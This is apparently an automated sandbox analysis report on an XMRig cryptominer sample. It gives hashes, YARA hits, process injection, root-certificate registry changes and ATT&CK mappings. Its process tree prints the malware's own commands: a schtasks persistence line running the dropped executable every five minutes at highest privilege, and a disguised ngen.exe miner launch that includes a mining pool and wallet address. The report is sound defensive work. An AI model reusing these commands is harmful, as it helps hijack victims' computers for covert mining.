xmrig | 96c6e2e05cc2fe89a0a88aa68ea749c06a35621ca4a74732aaccb25ed890657d

Analysis

max time kernel
119s
max time network
138s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
28/08/2023, 08:49

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

a9c1a64a330f7efb69db6bc253553412.exe
Size

1.1MB
MD5

a9c1a64a330f7efb69db6bc253553412
SHA1

39b827dd01d06b9fecc3c309d94440ba1001b3bf
SHA256

96c6e2e05cc2fe89a0a88aa68ea749c06a35621ca4a74732aaccb25ed890657d
SHA512

8fbad460d795c6719360c2ae8f84349b65371fb361e15ff840d178e7462570c36dc224e869fe63289c5e6da3532832b4bae552a7eeea3613f973e8f1b418b30e
SSDEEP

12288:ekmcopRKZ7xBgQ5J3GD+h49T151rJ+r9OzcTWB53V1LKGh9KhH3Jqv:ekqfKZ7jgoZm+y9v1lE0nfL5g

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 19 IoCs

miner

resource	yara_rule
behavioral1/memory/1428-121-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1428-122-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1428-123-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1428-125-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1428-126-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1428-127-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1428-128-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1428-129-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1428-132-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1428-135-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1428-137-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1428-138-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1428-139-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1428-140-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1428-141-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1428-142-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1428-143-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1428-144-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1428-145-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
312	GFQHS.exe
3060	white.exe

Loads dropped DLL 4 IoCs

pid	Process
2944	cmd.exe
1032	WerFault.exe
1032	WerFault.exe
1032	WerFault.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3060 set thread context of 1800	3060	white.exe	38
PID 312 set thread context of 1428	312	GFQHS.exe	41

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1032	3060	WerFault.exe	37

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2776	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3012	timeout.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	GFQHS.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	GFQHS.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	GFQHS.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	GFQHS.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	GFQHS.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	GFQHS.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1800	AppLaunch.exe
1800	AppLaunch.exe
312	GFQHS.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
468	Process not Found

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	3020	a9c1a64a330f7efb69db6bc253553412.exe
Token: SeDebugPrivilege	312	GFQHS.exe
Token: SeDebugPrivilege	1800	AppLaunch.exe
Token: SeLockMemoryPrivilege	1428	ngen.exe
Token: SeLockMemoryPrivilege	1428	ngen.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1428	ngen.exe

Suspicious use of WriteProcessMemory 47 IoCs

description	pid	Process	procid_target
PID 3020 wrote to memory of 2944	3020	a9c1a64a330f7efb69db6bc253553412.exe	28
PID 3020 wrote to memory of 2944	3020	a9c1a64a330f7efb69db6bc253553412.exe	28
PID 3020 wrote to memory of 2944	3020	a9c1a64a330f7efb69db6bc253553412.exe	28
PID 2944 wrote to memory of 3012	2944	cmd.exe	30
PID 2944 wrote to memory of 3012	2944	cmd.exe	30
PID 2944 wrote to memory of 3012	2944	cmd.exe	30
PID 2944 wrote to memory of 312	2944	cmd.exe	31
PID 2944 wrote to memory of 312	2944	cmd.exe	31
PID 2944 wrote to memory of 312	2944	cmd.exe	31
PID 312 wrote to memory of 2888	312	GFQHS.exe	32
PID 312 wrote to memory of 2888	312	GFQHS.exe	32
PID 312 wrote to memory of 2888	312	GFQHS.exe	32
PID 2888 wrote to memory of 2776	2888	cmd.exe	34
PID 2888 wrote to memory of 2776	2888	cmd.exe	34
PID 2888 wrote to memory of 2776	2888	cmd.exe	34
PID 312 wrote to memory of 3060	312	GFQHS.exe	37
PID 312 wrote to memory of 3060	312	GFQHS.exe	37
PID 312 wrote to memory of 3060	312	GFQHS.exe	37
PID 312 wrote to memory of 3060	312	GFQHS.exe	37
PID 3060 wrote to memory of 1800	3060	white.exe	38
PID 3060 wrote to memory of 1800	3060	white.exe	38
PID 3060 wrote to memory of 1800	3060	white.exe	38
PID 3060 wrote to memory of 1800	3060	white.exe	38
PID 3060 wrote to memory of 1800	3060	white.exe	38
PID 3060 wrote to memory of 1800	3060	white.exe	38
PID 3060 wrote to memory of 1800	3060	white.exe	38
PID 3060 wrote to memory of 1800	3060	white.exe	38
PID 3060 wrote to memory of 1800	3060	white.exe	38
PID 3060 wrote to memory of 1032	3060	white.exe	40
PID 3060 wrote to memory of 1032	3060	white.exe	40
PID 3060 wrote to memory of 1032	3060	white.exe	40
PID 3060 wrote to memory of 1032	3060	white.exe	40
PID 312 wrote to memory of 1428	312	GFQHS.exe	41
PID 312 wrote to memory of 1428	312	GFQHS.exe	41
PID 312 wrote to memory of 1428	312	GFQHS.exe	41
PID 312 wrote to memory of 1428	312	GFQHS.exe	41
PID 312 wrote to memory of 1428	312	GFQHS.exe	41
PID 312 wrote to memory of 1428	312	GFQHS.exe	41
PID 312 wrote to memory of 1428	312	GFQHS.exe	41
PID 312 wrote to memory of 1428	312	GFQHS.exe	41
PID 312 wrote to memory of 1428	312	GFQHS.exe	41
PID 312 wrote to memory of 1428	312	GFQHS.exe	41
PID 312 wrote to memory of 1428	312	GFQHS.exe	41
PID 312 wrote to memory of 1428	312	GFQHS.exe	41
PID 312 wrote to memory of 1428	312	GFQHS.exe	41
PID 312 wrote to memory of 1428	312	GFQHS.exe	41
PID 312 wrote to memory of 1428	312	GFQHS.exe	41

C:\Users\Admin\AppData\Local\Temp\a9c1a64a330f7efb69db6bc253553412.exe
"C:\Users\Admin\AppData\Local\Temp\a9c1a64a330f7efb69db6bc253553412.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3020
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp7B38.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2944
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:3012
- - C:\ProgramData\tagh\GFQHS.exe
    "C:\ProgramData\tagh\GFQHS.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:312
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "GFQHS" /tr "C:\ProgramData\tagh\GFQHS.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2888
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "GFQHS" /tr "C:\ProgramData\tagh\GFQHS.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:2776
  - - C:\Users\Admin\AppData\Roaming\white.exe
      "C:\Users\Admin\AppData\Roaming\white.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:3060
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1800
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 108
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:1032
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe --url pool.hashvault.pro:5555 --user 41r4ZZVFW5tbPRM1CMyeJZBtThZxyfPygGxwuUFy3fV7M7VXnykC6gqDiYWkj1fXzJhQS5h7VbWXt6N5ZEp6bB3z8hCfBG5 --pass X --donate-level 1 --max-cpu-usage=50
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:1428

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\tagh\GFQHS.exe

Filesize
1.1MB

MD5
a9c1a64a330f7efb69db6bc253553412

SHA1
39b827dd01d06b9fecc3c309d94440ba1001b3bf

SHA256
96c6e2e05cc2fe89a0a88aa68ea749c06a35621ca4a74732aaccb25ed890657d

SHA512
8fbad460d795c6719360c2ae8f84349b65371fb361e15ff840d178e7462570c36dc224e869fe63289c5e6da3532832b4bae552a7eeea3613f973e8f1b418b30e

Download Submit
C:\ProgramData\tagh\GFQHS.exe

Filesize
1.1MB

MD5
a9c1a64a330f7efb69db6bc253553412

SHA1
39b827dd01d06b9fecc3c309d94440ba1001b3bf

SHA256
96c6e2e05cc2fe89a0a88aa68ea749c06a35621ca4a74732aaccb25ed890657d

SHA512
8fbad460d795c6719360c2ae8f84349b65371fb361e15ff840d178e7462570c36dc224e869fe63289c5e6da3532832b4bae552a7eeea3613f973e8f1b418b30e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
304B

MD5
d69b2a13c20c627b3c7544895aa47aaf

SHA1
b969d6a1ff3726d38f3c813b70290446dd2d8e9c

SHA256
4f5141f2c542031c127c63d03b7ef33297a53ab3773ac94d1fd09dd18dd68ac4

SHA512
64a88337f6415c2a779b32c8c9907f8bccad113d21b2883c507c8fe33f7245f28494c71ca48fa000ff3372aa0aa9a1385e316103b805dd6dcab9711ec572128a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab987A.tmp

Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar99AA.tmp

Filesize
163KB

MD5
9441737383d21192400eca82fda910ec

SHA1
725e0d606a4fc9ba44aa8ffde65bed15e65367e4

SHA256
bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

SHA512
7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7B38.tmp.bat

Filesize
138B

MD5
907ff1621674b0bca29a8fa712bb360b

SHA1
3e60c34d6ff3b22a4611b54b6ea2fde194aca462

SHA256
22e5e0f41e7e9be27c3b8b236f1b9d0de46cea7f7c289b553ef99a4974250f61

SHA512
b4243ef3e7514c37301a1f0705339a33db12712a2d039d26280c9b50c3bf62bf3b571d0af72372d738c6c133de6b8977c16c0e0b336e15b3a1d2e3248128a65a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7B38.tmp.bat

Filesize
138B

MD5
907ff1621674b0bca29a8fa712bb360b

SHA1
3e60c34d6ff3b22a4611b54b6ea2fde194aca462

SHA256
22e5e0f41e7e9be27c3b8b236f1b9d0de46cea7f7c289b553ef99a4974250f61

SHA512
b4243ef3e7514c37301a1f0705339a33db12712a2d039d26280c9b50c3bf62bf3b571d0af72372d738c6c133de6b8977c16c0e0b336e15b3a1d2e3248128a65a

Download Submit
C:\Users\Admin\AppData\Roaming\white.exe

Filesize
10.0MB

MD5
e8bae28d2144081bb8e3aa27dfa7c5ec

SHA1
7a6e37a366c01f7db0449796244f8a6eb8ff85d5

SHA256
f5712d683a589ef10b9cbb88a42d42d811f885a41b823aa25baa0ebf7626b1dd

SHA512
241452f32cb1b6ad149cfd2f8a2ad0bbeac43b8c56f4a6a46563801748534d0266cd64705c63877ef59b2e69f9e0a831e0e14a8e82fba08b84a050195a5b732e

Download Submit
\ProgramData\tagh\GFQHS.exe

Filesize
1.1MB

MD5
a9c1a64a330f7efb69db6bc253553412

SHA1
39b827dd01d06b9fecc3c309d94440ba1001b3bf

SHA256
96c6e2e05cc2fe89a0a88aa68ea749c06a35621ca4a74732aaccb25ed890657d

SHA512
8fbad460d795c6719360c2ae8f84349b65371fb361e15ff840d178e7462570c36dc224e869fe63289c5e6da3532832b4bae552a7eeea3613f973e8f1b418b30e

Download Submit
\Users\Admin\AppData\Roaming\white.exe

Filesize
10.0MB

MD5
e8bae28d2144081bb8e3aa27dfa7c5ec

SHA1
7a6e37a366c01f7db0449796244f8a6eb8ff85d5

SHA256
f5712d683a589ef10b9cbb88a42d42d811f885a41b823aa25baa0ebf7626b1dd

SHA512
241452f32cb1b6ad149cfd2f8a2ad0bbeac43b8c56f4a6a46563801748534d0266cd64705c63877ef59b2e69f9e0a831e0e14a8e82fba08b84a050195a5b732e

Download Submit
\Users\Admin\AppData\Roaming\white.exe

Filesize
10.0MB

MD5
e8bae28d2144081bb8e3aa27dfa7c5ec

SHA1
7a6e37a366c01f7db0449796244f8a6eb8ff85d5

SHA256
f5712d683a589ef10b9cbb88a42d42d811f885a41b823aa25baa0ebf7626b1dd

SHA512
241452f32cb1b6ad149cfd2f8a2ad0bbeac43b8c56f4a6a46563801748534d0266cd64705c63877ef59b2e69f9e0a831e0e14a8e82fba08b84a050195a5b732e

Download Submit
\Users\Admin\AppData\Roaming\white.exe

Filesize
10.0MB

MD5
e8bae28d2144081bb8e3aa27dfa7c5ec

SHA1
7a6e37a366c01f7db0449796244f8a6eb8ff85d5

SHA256
f5712d683a589ef10b9cbb88a42d42d811f885a41b823aa25baa0ebf7626b1dd

SHA512
241452f32cb1b6ad149cfd2f8a2ad0bbeac43b8c56f4a6a46563801748534d0266cd64705c63877ef59b2e69f9e0a831e0e14a8e82fba08b84a050195a5b732e

Download Submit
memory/312-18-0x000007FEF5320000-0x000007FEF5D0C000-memory.dmp

Filesize
9.9MB

Download
memory/312-19-0x0000000001330000-0x0000000001442000-memory.dmp

Filesize
1.1MB

Download
memory/312-20-0x0000000000640000-0x00000000006C0000-memory.dmp

Filesize
512KB

Download
memory/312-133-0x000007FEF5320000-0x000007FEF5D0C000-memory.dmp

Filesize
9.9MB

Download
memory/312-87-0x000007FEF5320000-0x000007FEF5D0C000-memory.dmp

Filesize
9.9MB

Download
memory/312-88-0x0000000000640000-0x00000000006C0000-memory.dmp

Filesize
512KB

Download
memory/1428-129-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1428-136-0x00000000002E0000-0x0000000000300000-memory.dmp

Filesize
128KB

Download
memory/1428-147-0x0000000000390000-0x00000000003B0000-memory.dmp

Filesize
128KB

Download
memory/1428-146-0x0000000000390000-0x00000000003B0000-memory.dmp

Filesize
128KB

Download
memory/1428-145-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1428-144-0x0000000140000000-0x00000001407C9000-memory.dmp

